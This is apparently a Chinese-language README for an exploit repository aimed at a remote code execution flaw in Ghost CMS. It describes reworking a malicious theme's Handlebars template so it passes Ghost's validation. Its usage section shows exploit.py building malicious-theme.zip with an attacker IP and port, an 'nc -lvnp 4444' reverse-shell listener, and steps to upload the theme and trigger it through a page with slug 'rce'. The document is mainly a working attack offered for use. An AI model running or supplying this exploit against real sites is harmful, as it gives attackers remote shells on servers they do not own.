
在 Ghost CMS 中发现(RCE)远程代码执行漏洞(具体影响 0.7.2 至 6.19.0 版本)
这是对 rootxran 针对同一 CVE 的仓库的重制版本 - https://github.com/rootxran/CVE-2026-29053
在针对特定 Ghost CMS 环境进行测试时,原始主题载荷触发了致命 Handlebars 错误。由于该 CMS 在 author.hbs 文件中引用了已弃用或缺失的辅助函数(social_url),导致其无法激活恶意主题。
我已更新 Handlebars 模板,改用原生且兼容的辅助函数。这确保了主题能够通过 Ghost 的内部验证检查,使漏洞利用能够成功激活,而不会被主题引擎的安全解析器阻止。
使用方法:(视频指南请参考原始漏洞利用)。
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. 上传主题,创建 slug 为 'rce' 的页面
3. 访问 /rce/